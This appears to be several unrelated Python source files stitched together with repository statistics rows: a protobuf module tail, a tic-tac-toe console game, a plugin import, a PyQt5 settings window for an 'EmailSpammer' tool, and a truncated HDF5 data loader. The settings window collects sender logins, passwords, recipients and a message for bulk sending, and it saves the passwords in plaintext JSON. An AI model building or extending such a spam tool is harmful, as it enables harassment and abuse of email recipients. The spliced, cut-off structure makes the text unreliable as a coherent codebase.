_sym_db.RegisterMessage(Query.Set.Values.Ints)
_sym_db.RegisterMessage(Query.Set.Values.Doubles)
_sym_db.RegisterMessage(Query.Set.Values.Strings)
_sym_db.RegisterMessage(Query.Set.Values.Bools)
_sym_db.RegisterMessage(Query.Set.Values.Locations)
_sym_db.RegisterMessage(Query.ConstraintExpr)
_sym_db.RegisterMessage(Query.ConstraintExpr.Or)
_sym_db.RegisterMessage(Query.ConstraintExpr.And)
_sym_db.RegisterMessage(Query.ConstraintExpr.Not)
_sym_db.RegisterMessage(Query.ConstraintExpr.Constraint)
_sym_db.RegisterMessage(Query.Model)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 33.935059 | 5,427 | 0.603765 | 7,952 | 77,338 | 5.552943 | 0.045649 | 0.041307 | 0.068845 | 0.079217 | 0.814933 | 0.780828 | 0.74987 | 0.700002 | 0.661413 | 0.633082 | 0 | 0.034518 | 0.290142 | 77,338 | 2,278 | 5,428 | 33.949956 | 0.769814 | 0.030929 | 0 | 0.723356 | 1 | 0.000454 | 0.174362 | 0.133248 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.001814 | 0 | 0.001814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
af0b8753cc2dc846b006253716342a5cb4d2fedf | 5,804 | py | Python | tic tac toe.py | Arrangonsalves/Tic-Tac-Toe | 10aa15de21b92ec540aa9601365164ae27311a37 | [
"MIT"
] | null | null | null | tic tac toe.py | Arrangonsalves/Tic-Tac-Toe | 10aa15de21b92ec540aa9601365164ae27311a37 | [
"MIT"
] | null | null | null | tic tac toe.py | Arrangonsalves/Tic-Tac-Toe | 10aa15de21b92ec540aa9601365164ae27311a37 | [
"MIT"
] | null | null | null | import os
l=['-','-','-','-','-','-','-','-','-']
flag=0
def des():
print(' ','-'*21)
print(' ','|'' ''|'' ''|'' ''|')
print(' ','|'' ''|'' ''|'' ''|')
print(' ','|'' %s ''|'' %s ''|'' %s ''|'%(l[0],l[1],l[2]))
print(' ','|'' 1 ''|'' 2 ''|'' 3 ''|')
print(' ','|'' ''|'' ''|'' ''|')
print(' ','-'*21)
print(' ','|'' ''|'' ''|'' ''|')
print(' ','|'' ''|'' ''|'' ''|')
print(' ','|'' %s ''|'' %s ''|'' %s ''|'%(l[3],l[4],l[5]))
print(' ','|'' 4 ''|'' 5 ''|'' 6 ''|')
print(' ','|'' ''|'' ''|'' ''|')
print(' ','-'*21)
print(' ','|'' ''|'' ''|'' ''|')
print(' ','|'' ''|'' ''|'' ''|')
print(' ','|'' %s ''|'' %s ''|'' %s ''|'%(l[6],l[7],l[8]))
print(' ','|'' 7 ''|'' 8 ''|'' 9 ''|')
print(' ','|'' ''|'' ''|'' ''|')
print(' ','-'*21)
des()
def win():
global flag
if(l[0]=='X' and l[1]=='X' and l[2]=='X'):
print('Player one wins')
flag=1
elif(l[0]=='O' and l[1]=='O' and l[2]=='O' ):
print('Player two wins')
flag=1
elif(l[3]=='X' and l[4]=='X' and l[5]=='X' ):
print('Player one wins')
flag=1
elif(l[3]=='O' and l[4]=='O' and l[5]=='O' ):
print('Player two wins')
flag=1
elif(l[6]=='X' and l[7]=='X' and l[8]=='X' ):
print('Player one wins')
flag=1
elif(l[6]=='O' and l[7]=='O' and l[8]=='O' ):
print('Player two wins')
flag=1
elif(l[0]=='X' and l[3]=='X' and l[6]=='X' ):
print('Player one wins')
flag=1
elif(l[0]=='O' and l[3]=='O' and l[6]=='O' ):
print('Player two wins')
flag=1
elif(l[1]=='X' and l[4]=='X' and l[7]=='X' ):
print('Player one wins')
flag=1
elif(l[1]=='O' and l[4]=='O' and l[7]=='O' ):
print('Player two wins')
flag=1
elif(l[2]=='X' and l[5]=='X' and l[8]=='X' ):
print('Player one wins')
flag=1
elif(l[2]=='O' and l[5]=='O' and l[8]=='O' ):
print('Player two wins')
flag=1
elif(l[0]=='X' and l[4]=='X' and l[8]=='X' ):
print('Player one wins')
flag=1
elif(l[0]=='O' and l[4]=='O' and l[8]=='O' ):
print('Player two wins')
flag=1
elif(l[2]=='X' and l[4]=='X' and l[6]=='X' ):
print('Player one wins')
flag=1
elif(l[2]=='O' and l[4]=='O' and l[6]=='O' ):
print('Player two wins')
flag=1
for p in range(1,10):
if(p%2==0):
print('Player 2 turn')
x=int(input('Enter the position '))
if(x==1 and l[0]=='-'):
l[0]='O'
win()
if(flag==1):
break
elif(x==2 and l[1]=='-'):
l[1]='O'
win()
if(flag==1):
break
elif(x==3 and l[2]=='-'):
l[2]='O'
win()
if(flag==1):
break
elif(x==4 and l[3]=='-'):
l[3]='O'
win()
if(flag==1):
break
elif(x==5 and l[4]=='-'):
l[4]='O'
win()
if(flag==1):
break
elif(x==6 and l[5]=='-'):
l[5]='O'
win()
if(flag==1):
break
elif(x==7 and l[6]=='-'):
l[6]='O'
win()
if(flag==1):
break
elif(x==8 and l[7]=='-'):
l[7]='O'
win()
if(flag==1):
break
elif(x==9 and l[8]=='-'):
l[8]='O'
win()
if(flag==1):
break
else:
print('Space is occupied,therefore your chance is skipped')
continue
else:
print('Player 1 turn')
x=int(input('Enter the position '))
if(x==1 and l[0]=='-'):
l[0]='X'
win()
if(flag==1):
break
elif(x==2 and l[1]=='-'):
l[1]='X'
win()
if(flag==1):
break
elif(x==3 and l[2]=='-'):
l[2]='X'
win()
if(flag==1):
break
elif(x==4 and l[3]=='-'):
l[3]='X'
win()
if(flag==1):
break
elif(x==5 and l[4]=='-'):
l[4]='X'
win()
if(flag==1):
break
elif(x==6 and l[5]=='-'):
l[5]='X'
win()
if(flag==1):
break
elif(x==7 and l[6]=='-'):
l[6]='X'
win()
if(flag==1):
break
elif(x==8 and l[7]=='-'):
l[7]='X'
win()
if(flag==1):
break
elif(x==9 and l[8]=='-'):
l[8]='X'
win()
if(flag==1):
break
else:
print('Space is occupied ,therefore your chance is skipped')
continue
des()
if(flag==1):
des()
| 31.372973 | 85 | 0.276361 | 669 | 5,804 | 2.397608 | 0.076233 | 0.124688 | 0.082918 | 0.112219 | 0.90399 | 0.879676 | 0.874688 | 0.844763 | 0.834788 | 0.743142 | 0 | 0.05746 | 0.48725 | 5,804 | 184 | 86 | 31.543478 | 0.481519 | 0 | 0 | 0.722222 | 0 | 0 | 0.197792 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011111 | false | 0 | 0.005556 | 0 | 0.016667 | 0.216667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
af5365fa2eb2fb9697412fe92432a020578a62a1 | 104 | py | Python | howcani/plugins/__init__.py | rahuldshetty/howcani | 974e129c6edd97a0c234e6c2f1c4c084fecd8584 | [
"MIT"
] | null | null | null | howcani/plugins/__init__.py | rahuldshetty/howcani | 974e129c6edd97a0c234e6c2f1c4c084fecd8584 | [
"MIT"
] | null | null | null | howcani/plugins/__init__.py | rahuldshetty/howcani | 974e129c6edd97a0c234e6c2f1c4c084fecd8584 | [
"MIT"
] | null | null | null | from howcani.plugins.Plugin import Plugin
from howcani.plugins.stackoverflow import StackOverflowPlugin | 34.666667 | 61 | 0.884615 | 12 | 104 | 7.666667 | 0.583333 | 0.23913 | 0.391304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 104 | 3 | 61 | 34.666667 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
af8bd2c6158d048a6b436f172fa4359ae186a75f | 19,243 | py | Python | emailSpammerSettings.py | ohgodmanyo/Email-Spammer-V2 | 47d2b449043528aae6fc0d130186c33688c1e7c5 | [
"Apache-2.0"
] | null | null | null | emailSpammerSettings.py | ohgodmanyo/Email-Spammer-V2 | 47d2b449043528aae6fc0d130186c33688c1e7c5 | [
"Apache-2.0"
] | null | null | null | emailSpammerSettings.py | ohgodmanyo/Email-Spammer-V2 | 47d2b449043528aae6fc0d130186c33688c1e7c5 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'emailSpammerSettings.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
import json
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(469, 348)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(9, 9, 9))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(9, 9, 9))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(9, 9, 9))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(9, 9, 9))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
MainWindow.setPalette(palette)
self.centralwidget = QtWidgets.QWidget(MainWindow)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(20, 20, 20))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(20, 20, 20))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(20, 20, 20))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(20, 20, 20))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
self.centralwidget.setPalette(palette)
self.centralwidget.setObjectName("centralwidget")
self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit.setGeometry(QtCore.QRect(110, 80, 241, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.lineEdit.setPalette(palette)
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
self.lineEdit.setFont(font)
self.lineEdit.setText("")
self.lineEdit.setObjectName("lineEdit")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(10, 10, 441, 71))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(207, 207, 207))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(200, 200, 200))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(31, 31, 31, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(207, 207, 207))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(200, 200, 200))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(31, 31, 31, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(31, 31, 31, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.label.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Rockwell")
font.setPointSize(30)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(10, 323, 291, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(227, 227, 227))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(227, 227, 227))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
self.label_2.setPalette(palette)
self.label_2.setObjectName("label_2")
self.lineEdit_2 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_2.setGeometry(QtCore.QRect(110, 110, 241, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.lineEdit_2.setPalette(palette)
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
self.lineEdit_2.setFont(font)
self.lineEdit_2.setText("")
self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEdit_2.setObjectName("lineEdit_2")
self.checkBox = QtWidgets.QCheckBox(self.centralwidget)
self.checkBox.stateChanged.connect(self.clickBox)
self.checkBox.setGeometry(QtCore.QRect(360, 110, 70, 17))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(221, 221, 221))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 213, 213))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(188, 188, 188))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 213, 213, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(221, 221, 221))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 213, 213))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(188, 188, 188))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 213, 213, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.checkBox.setPalette(palette)
self.checkBox.setObjectName("checkBox")
self.lineEdit_3 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_3.setGeometry(QtCore.QRect(110, 140, 241, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.lineEdit_3.setPalette(palette)
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
self.lineEdit_3.setFont(font)
self.lineEdit_3.setText("")
self.lineEdit_3.setObjectName("lineEdit_3")
self.lineEdit_4 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_4.setGeometry(QtCore.QRect(110, 170, 241, 20))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(36, 36, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 24, 24, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.lineEdit_4.setPalette(palette)
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
self.lineEdit_4.setFont(font)
self.lineEdit_4.setText("")
self.lineEdit_4.setObjectName("lineEdit_4")
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(180, 210, 111, 23))
self.pushButton.setObjectName("pushButton")
self.pushButton.clicked.connect(self.button_func)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def clickBox(self, state):
if state == QtCore.Qt.Checked:
self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Normal)
else:
self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Password)
def button_func(self):
data = {
'username': self.lineEdit.text().split(', '),
'password': self.lineEdit_2.text().split(', '),
'recipient': self.lineEdit_3.text().split(', '),
'message': self.lineEdit_4.text()
}
with open('settings.json', 'w') as f:
f.write(json.dumps(data, indent=4))
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "EmailSpammer Settings"))
self.lineEdit.setPlaceholderText(_translate("MainWindow", "Sender(s)"))
self.label.setText(_translate("MainWindow", "EmailSpammer Settings"))
self.label_2.setText(_translate("MainWindow", "*If you have multiple entries, separate them with a comma"))
self.lineEdit_2.setPlaceholderText(_translate("MainWindow", "Password(s)"))
self.checkBox.setText(_translate("MainWindow", "Visible"))
self.lineEdit_3.setPlaceholderText(_translate("MainWindow", "Recipient(s)"))
self.lineEdit_4.setPlaceholderText(_translate("MainWindow", "Message"))
self.pushButton.setText(_translate("MainWindow", "Update Settings"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 55.455331 | 116 | 0.676766 | 2,201 | 19,243 | 5.89005 | 0.086779 | 0.153425 | 0.088861 | 0.116631 | 0.80415 | 0.797516 | 0.77345 | 0.762342 | 0.759256 | 0.756788 | 0 | 0.045265 | 0.202099 | 19,243 | 346 | 117 | 55.615607 | 0.799075 | 0.014811 | 0 | 0.716923 | 1 | 0 | 0.024995 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012308 | false | 0.012308 | 0.009231 | 0 | 0.024615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bbce9cf4438215156827b41db09cbc84cfd476d1 | 2,151 | py | Python | image.py | xuweigogogo/DSACA | 7b7de22bd770c3cc2856fcb6dc58ff07cd2a3571 | [
"MIT"
] | 8 | 2021-04-12T08:54:48.000Z | 2022-03-14T06:27:12.000Z | image.py | xuweigogogo/DSACA | 7b7de22bd770c3cc2856fcb6dc58ff07cd2a3571 | [
"MIT"
] | null | null | null | image.py | xuweigogogo/DSACA | 7b7de22bd770c3cc2856fcb6dc58ff07cd2a3571 | [
"MIT"
] | null | null | null | import h5py
import time
import torch
import numpy as np
from PIL import Image
import cv2
def load_data_visdrone_class_8(img_path,train = True):
while True:
try:
gt_path = img_path.replace('.jpg','.h5').replace('images','gt_density_map')
img = Image.open(img_path).convert('RGB')
torch.cuda.synchronize()
begin_time_test_7 = time.time()
gt_file = h5py.File(gt_path)
torch.cuda.synchronize()
end_time_test_7 = time.time()
run_time_7 = end_time_test_7 - begin_time_test_7
# print('该循环程序运行时间7:', run_time_7)
# mask_map = np.asarray(gt_file['mask'][()])
target = np.asarray(gt_file['density_map'][()][0:8,:,:])
mask = np.asarray(gt_file['mask'][()][0:8,:,:])
# k = np.asarray(gt_file['kpoint'][()])
break
except IOError:
cv2.waitKey(5)
img=img.copy()
mask=mask.copy()
mask[mask<=4]=1
